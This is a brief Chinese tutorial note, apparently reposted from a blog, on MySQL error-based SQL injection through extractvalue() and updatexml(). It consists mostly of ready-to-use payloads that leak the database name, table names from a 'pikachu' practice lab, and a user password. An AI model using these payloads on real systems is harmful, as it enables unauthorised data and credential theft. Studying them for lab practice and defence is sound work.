extractvalue() 和 updatexml()报错注入

使用基于函数的报错注入，函数会执行，并将结果返和错误信息一起返回

使用concat将字符串拼接，防止错误信息显示不全

‘ and updatexml(1,concat(‘!‘,database()),1)#

‘ and extractvalue(1,concat(‘!‘,database()))#

当结合查询语句是，使用括号，使用查询时只能包含一列字段结果自能有一行

‘ and updatexml(1,concat(‘!‘,(select table_name from information_schema.tables where table_schema=‘pikachu‘ limit 1)),1)#

‘ and extractvalue(1,concat(‘!‘,(select password from users limit 1)))#

extractvalue() 和 updatexml()报错注入

原文：https://www.cnblogs.com/kikochz/p/13676098.html